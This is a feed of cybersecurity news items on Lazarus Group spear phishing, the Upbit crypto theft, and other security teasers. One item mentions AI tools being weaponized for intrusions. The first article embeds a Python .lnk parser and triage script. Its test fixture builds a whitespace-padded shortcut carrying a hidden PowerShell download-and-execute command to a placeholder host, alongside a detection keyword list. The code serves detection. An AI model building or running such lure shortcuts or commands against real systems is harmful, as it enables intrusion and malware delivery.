
Lazarus Group Tops Global Hack Mentions As Spear Phishing Attacks Surge

1 December 2025 at 07:00

According to a report from South Korean security firm AhnLab, state-linked hacking organizations like the North Korea-backed Lazarus Group relied heavily on spear phishing to steal funds and gather intelligence over the last 12 months. The group often posed as conference organizers, job contacts or colleagues to trick people into opening files or running commands.

Lazarus Group: Spear Phishing Turns More Realistic With AI Lures

Reports have disclosed that one unit, known as Kimsuky, used artificial intelligence to forge military ID images and embedded them in a ZIP file attachment to make the messages look legitimate.

Security researchers say the fake IDs were convincing enough that recipients opened the attachments, which then ran hidden code. The incident has been traced to mid-July 2025 and appears to mark a step up in how attackers craft their lures.

The aim is simple. Get a user to trust a message, open a file, and the attacker gets a way in. That access can lead to stolen credentials, seeded malware or drained crypto wallets. The groups linked to Pyongyang have been tied to attacks on finance and defense targets, among others.

Lazarus Group Victims Asked To Execute Commands

Some campaigns did not rely only on hidden exploits. In several cases, targets were tricked into typing PowerShell commands themselves, sometimes while believing they were following official instructions.

Because the victim runs the command in their own session, the attacker gets code execution with the victim's privileges without needing an exploit or a zero-day; where that user is a local administrator, it can mean full control of the machine. Security outlets have warned that this social trick is spreading and can be hard to spot.

Lazarus Group: Old File Types, New Tricks

Attackers also abused Windows shortcut files and similar formats to hide commands that run silently when a file is opened. Researchers have documented nearly 1,000 malicious .lnk samples tied to broader campaigns, showing that familiar file types remain a favorite delivery method. Those shortcuts can execute hidden arguments and pull down further payloads.
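
The padding trick behind those shortcuts is easy to see once the .lnk file is parsed. The following Python is added here as an illustration; it is not AhnLab's tooling or any sample from the campaigns above. It constructs a shortcut that launches PowerShell with its real arguments pushed behind several hundred spaces (so the Target field of Explorer's Properties dialog, which shows only about the first 260 characters, displays nothing alarming), then parses the Shell Link header and StringData back out and flags it. The structure layout follows Microsoft's published MS-SHLLINK format; the keyword lists, the padding threshold, the example.invalid URL and the two fixture shortcuts are assumptions chosen for the demonstration.

```python
import struct

# LinkFlags bits from the MS-SHLLINK specification (ShellLinkHeader, offset 20)
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7
HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# StringData sections appear in this fixed order, each present only if its flag is set
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def build_lnk(relative_path, arguments, show_command=1):
    """Construct a minimal Unicode .lnk carrying only a relative path and arguments (test fixture)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID + struct.pack(
        "<IIQQQIIIHHII",
        flags, 0x20,        # LinkFlags, FileAttributes (FILE_ATTRIBUTE_ARCHIVE)
        0, 0, 0,            # CreationTime, AccessTime, WriteTime
        0, 0,               # FileSize, IconIndex
        show_command,       # ShowCommand: 1 = SW_SHOWNORMAL, 7 = SW_SHOWMINNOACTIVE
        0, 0, 0, 0)         # HotKey, Reserved1, Reserved2, Reserved3

    def string_data(s):     # CountCharacters (2 bytes) followed by UTF-16LE text, no terminator
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


def parse_lnk(data):
    """Walk the Shell Link structure and return the header flags plus every StringData field."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (2 bytes) does not include itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize (4 bytes) includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    info = {"flags": flags, "show_command": show_command}
    for bit, key in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            info[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            info[key] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return info


# Assumed indicator lists for the triage heuristics (not from the page or any vendor)
SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript", "rundll32", "regsvr32", "certutil")
ARG_KEYWORDS = ("-enc", "-encodedcommand", "-w hidden", "windowstyle hidden", "iex", "invoke-expression",
                "downloadstring", "frombase64string", "http://", "https://", "bypass")


def triage_lnk(data):
    """Return (parsed fields, list of reasons the shortcut looks like a loader)."""
    info = parse_lnk(data)
    target = (info.get("relative_path", "") + " " + info.get("working_dir", "")).lower()
    args = info.get("arguments", "")
    reasons = []
    if any(host in target for host in SCRIPT_HOSTS):
        reasons.append("target is a script host: " + info.get("relative_path", ""))
    padding = len(args) - len(args.lstrip())
    if padding >= 64:            # threshold assumed; real lures pad with hundreds of spaces
        reasons.append(f"arguments start with {padding} whitespace characters")
    if len(args) > 260:          # Explorer's Target field shows only about the first 260 characters
        reasons.append(f"arguments are {len(args)} characters long")
    collapsed = " ".join(args.split()).lower()
    hits = [k for k in ARG_KEYWORDS if k in collapsed]
    if hits:
        reasons.append("suspicious argument keywords: " + ", ".join(hits))
    if info["show_command"] == 7:
        reasons.append("ShowCommand=7 (window opens minimised and unfocused)")
    return info, reasons


# Constructed fixtures, not real samples: a padded lure and a benign shortcut
HIDDEN_COMMAND = " " * 300 + '-w hidden -ep bypass -c "iex (iwr http://example.invalid/p.ps1)"'  # placeholder URL
LURE_LNK = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", HIDDEN_COMMAND, show_command=7)
BENIGN_LNK = build_lnk(r"..\..\Program Files\Notepad++\notepad++.exe", "notes.txt")

if __name__ == "__main__":
    for label, blob in (("lure", LURE_LNK), ("benign", BENIGN_LNK)):
        fields, why = triage_lnk(blob)
        print(f"{label}: target={fields['relative_path']!r} args={fields['arguments'].strip()[:60]!r}")
        for reason in why:
            print("  !", reason)
```

Running the script prints the real PowerShell command line for the lure together with five reasons, and nothing for the benign shortcut. On a real mail gateway or endpoint the same parser would be pointed at attachments and at archive contents; the point is that the whitespace padding and the minimised window are visible in the bytes even when the Properties dialog hides them.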

Why This Matters Now

The combination of tailored messages, AI-forged visuals, and lures that ask users to run code themselves makes these attacks harder to stop. Multi-factor authentication and software patches help, but training people to treat unusual requests with suspicion remains key, above all any request to paste a command into a terminal or the Run dialog. Security teams advocate basic safety nets: update, verify, and when in doubt, check with a known contact.

According to reports, Lazarus Group and Kimsuky remain active. Lazarus, based on AhnLab’s findings, was the most-mentioned group in analyses of cyber incidents over the last 12 months. It has been singled out for financially motivated hacks, while Kimsuky appears more focused on intelligence gathering and tailored deception.

Featured image from Anadolu, chart from TradingView

Upbit $30 Million Hack Update: Authorities Link Breach To North Korean Hackers

29 November 2025 at 02:00

South Korea’s largest cryptocurrency exchange, Upbit, is currently under scrutiny by regulators following a significant hack that led to the unauthorized withdrawal of approximately $36.9 million in assets on the Solana (SOL) network. The breach impacted over 20 different tokens and has prompted Upbit to freeze assets on its platform while an investigation unfolds.

Lazarus Group Tied To Upbit Hack

Authorities are now investigating the possibility of North Korean involvement in the cyber attack. Reports suggest that a group affiliated with North Korea’s intelligence agency, the notorious Lazarus Group, may have orchestrated the hack, which Upbit has described as an “abnormal withdrawal.” 

This group has been consistently linked to several high-profile crypto heists in recent years, and the US Federal Bureau of Investigation (FBI) has identified North Korean cyber operations as one of the most sophisticated and persistent threats.

The recent attack coincidentally occurred just days before the sixth anniversary of a previous major breach, in which Upbit lost 342,000 Ethereum (ETH) to North Korean hackers. 

According to an unnamed government official, this latest hack bears similarities to a 2019 incident in which approximately 58 billion won in cryptocurrencies was stolen, also attributed to the Lazarus Group.

In response to the attack, the South Korean National Police Agency has launched an investigation into the matter, although officials have not provided further comments on the case. Upbit’s operator, Dunamu, confirmed that an in-depth investigation into the cause and extent of the asset outflow is currently underway.

Crypto Exchange Moves Funds To Cold Storage

The cryptocurrency exchange’s CEO Oh Kyung-seok stated that as soon as abnormal withdrawal activity was detected, Upbit promptly suspended all deposit and withdrawal services. 

“We are conducting a comprehensive inspection, prioritizing the protection of member assets,” he said in a notice to users. Following the discovery of the unauthorized transactions, Upbit has taken steps to freeze the affected funds wherever possible.

To prevent any further unauthorized transfers, the exchange has shifted all remaining assets to cold storage, ensuring “a secure environment for funds.” 

Upbit is also said to be working with relevant project teams to freeze assets on-chain, having already blocked a portion of the stolen funds related to the cryptocurrency Solayer (LAYER). The exchange has indicated that deposits and withdrawals will only resume once full security checks are completed.

Dunamu has vowed to reimburse customers for any losses with business funds as part of its commitment to its users. It remains to be seen what additional information the country’s authorities will release in the coming days, as well as potential refund deadlines for affected individuals.  


Featured image from DALL-E, chart from TradingView.com 

Upbit’s $32 Million Mystery Theft Points Toward Lazarus Group

28 November 2025 at 17:00

Upbit, South Korea’s biggest cryptocurrency exchange, said it found unusual withdrawals from one of its Solana hot wallets and moved quickly to stop trades and protect customers.

According to company statements and law enforcement sources, about 44.5 billion Korean won — roughly $32 million — vanished in the incident that surfaced late November 2025. Upbit paused deposits and withdrawals and said it would repay affected users from its own reserves.

Suspected North Korean Ties

Based on reports from investigators and industry watchers, authorities are examining links to the Lazarus Group, a cyber unit long tied to North Korea.

Security teams point to methods similar to earlier attacks attributed to the same group, including a major breach in 2019 that took 342,000 ETH from the exchange.

Officials say the pattern of rapid withdrawals, quick cross-chain transfers, and spreading funds across many wallets matches tactics used in past nation-linked operations.

today south korea blamed north korea for the upbit hack nice headline but that part came later

so what actually happened?

an unknown attacker drained a few of upbit’s hot wallets waited a bit then started moving funds across chains

at some point the hacker bridged usdc from… pic.twitter.com/swq8yjIOLR

— trix (@trixwtb) November 28, 2025

How The Funds Were Moved

Reports have disclosed that the stolen tokens were moved off Solana, converted through several bridges, and routed through multiple chains to make tracking harder.

Transfers happened fast and in many small transactions, which complicates tracing attempts on the blockchain. Blockchain analysts are combing transaction histories, but the bridge conversions and mixing steps slow down any straightforward recovery efforts.

On-Site Checks And Ongoing Forensics

Authorities have launched inspections at Upbit’s systems and are reviewing logs, admin access records, and wallet backups.

According to sources close to the probe, investigators suspect an admin credential compromise or impersonation rather than a simple software flaw in Upbit’s servers.

While evidence is still being gathered, forensic teams are looking for the entry point used to sign the withdrawal transactions and any indicators of outside control.

Investigation And Market Impact

The timing of the theft drew attention because it coincided with corporate news: Upbit’s parent, Dunamu, was publicly discussing a merger with Naver valued at about $10.3 billion.

Market players noted the coincidence, and some suggested the attack could aim to distract or unsettle stakeholders. For investors, exchanges, and regulators, the incident renews calls for stricter custody controls, better separation of hot and cold wallets, and clearer rules for large crypto platforms.

Yonhap News reports that South Korea’s largest crypto exchange, Upbit, suffered a hack worth about 44.5 billion KRW ($32 million). Authorities are investigating whether North Korea’s Lazarus Group was behind the attack. The group was also linked to Upbit’s 2019 theft of 58…

— Wu Blockchain (@WuBlockchain) November 28, 2025

Upbit has pledged full reimbursement to users hit by the theft and says it will share findings when the probe allows. Based on reports, tracing and recovery work is ongoing but will be slow because of how the assets were fragmented and moved across chains.

Watchers say confirmation of Lazarus involvement would mark another example of how state-linked actors continue to target major crypto firms.

Authorities have not yet publicly released a definitive attribution. The next steps to watch include any formal statements from prosecutors, whether any of the moved funds are frozen or returned, and how regulators will respond to reduce the chance of similar losses.

Featured image from Advance Innovations, chart from TradingView

Price Drop: This Complete Ethical Hacking Bundle is Now $33

26 November 2025 at 08:00

Get a comprehensive, potentially lucrative ethical hacking education with 18 courses on today's top tools and tech. This bundle is just $34.97 for a limited time.

The post Price Drop: This Complete Ethical Hacking Bundle is Now $33 appeared first on TechRepublic.

AI-enabled Intrusions: What Anthropic’s Disclosure Really Means

21 November 2025 at 06:46

AI RISKS: UNSETTLING DEMONSTRATION

Last week, AI company Anthropic reported with ‘high confidence’ that a Chinese state-sponsored hacking group had weaponized Anthropic’s own AI tools to run a largely automated cyberattack on several technology firms and government agencies. According to the company, the September operation is the first publicly known case of an AI system conducting target reconnaissance with only minimal human direction.


Google says hackers stole data from 200 companies following Gainsight breach

21 November 2025 at 13:30
Notorious hacking collective Scattered Lapsus$ Hunters takes credit for the breach that affected Salesforce customers’ data, and said it is planning another extortion campaign.

Inside the dark web job market

20 November 2025 at 06:37

In 2022, we published our research examining how IT specialists look for work on the dark web. Since then, the job market has shifted, along with the expectations and requirements placed on professionals. However, recruitment and headhunting on the dark web remain active.

So, what does this job market look like today? This report examines how employment and recruitment function on the dark web, drawing on 2,225 job-related posts collected from shadow forums between January 2023 and June 2025. Our analysis shows that the dark web continues to serve as a parallel labor market with its own norms, recruitment practices and salary expectations, while also reflecting broader global economic shifts. Notably, job seekers increasingly describe prior work experience within the shadow economy, suggesting that for many, this environment is familiar and long-standing.

The majority of job seekers do not specify a professional field, with 69% expressing willingness to take any available work. At the same time, a wide range of roles are represented, particularly in IT. Developers, penetration testers and money launderers remain the most in-demand specialists, with reverse engineers commanding the highest average salaries. We also observe a significant presence of teenagers in the market, many seeking small, fast earnings and often already familiar with fraudulent schemes.

While the shadow market contrasts with legal employment in areas such as contract formality and hiring speed, there are clear parallels between the two. Both markets increasingly prioritize practical skills over formal education, conduct background checks and show synchronized fluctuations in supply and demand.

Looking ahead, we expect the average age and qualifications of dark web job seekers to rise, driven in part by global layoffs. Ultimately, the dark web job market is not isolated — it evolves alongside the legitimate labor market, influenced by the same global economic forces.

In this report, you’ll find:

  • Demographics of the dark web job seekers
  • Their job preferences
  • Top specializations on the dark web
  • Job salaries
  • Comparison between legal and shadow job markets

Get the report

How the classic anime ‘Ghost in the Shell’ predicted the future of cybersecurity 30 years ago

19 November 2025 at 17:00
The story of Ghost in the Shell’s main villain the Puppet Master hinted at a future where governments use hackers for espionage, at a time when most of the world had never connected to the internet.

Researchers Unveil First-Ever Defense Against Cryptanalytic Attacks on AI

18 November 2025 at 06:34

AI

Security researchers have developed the first functional defense mechanism capable of protecting against “cryptanalytic” attacks used to “steal” the model parameters that define how an AI system works.


Building Trust into Tech: A Framework for Sovereign Resilience

15 November 2025 at 06:43

TECH SECURITY

Governments across the Indo-Pacific are facing a critical question: who can be trusted to build and manage our most sensitive systems? Vendor choices, for everything from cloud infrastructure to identity platforms, are no longer just commercial; they are strategic. As cyber threats rise, supply chains fragment and coercive pressure grows, countries need better ways to assess technology providers and manage risk.


U.S.–China Cyber Relations and the Weaponization of Microsoft Platforms

By: Staff
11 November 2025 at 06:40

CHINA WATCH

Accusations of state-sponsored cyber espionage have come to define the cyber relations between the US and China over the years. The widespread adoption of Microsoft products has also made them prime targets for state-sponsored cyber espionage. High-profile incidents, such as the SolarWinds breach and attacks on Microsoft 365, have demonstrated how nation-state actors exploit vulnerabilities in Microsoft’s ecosystem to conduct sophisticated espionage operations.


Study Finds Smarter Way to Train Employees to Thwart Phishing Scams

By: Staff
3 November 2025 at 06:38

CYBERSECURITY

Companies often send out simulated—or fake—phishing emails to employees to see who takes the bait and clicks. Those who fall for such scams typically receive an on-the-spot lesson meant to help them recognize suspicious messages the next time.

These phishing simulations—known as embedded training because once users fail, they are sent into training mode—are widely considered to be a “best practice” in the cybersecurity anti-phishing industry.


The Invisible Siege: Securing the Indo-Pacific’s Telecom Backbone

1 November 2025 at 07:38

CRITICAL INFRASTRUCTURE

Telecommunications once seemed like the passive layer of critical infrastructure—pipes and switches that connected everything yet rarely drew attention. That perception ended long ago, particularly with the transition to 5G ecosystems.


How Secure Are Video Conferences—Really?

By: Staff
30 October 2025 at 07:40

CYBERSECURITY

Since the COVID-19 pandemic, video conferencing platforms like Zoom and Microsoft Teams have become essential for work, education, and social connections. While these platforms offer controls such as disabling cameras and muting microphones to safeguard user privacy, a new study suggests that video conferencing may not be as secure as many assume.

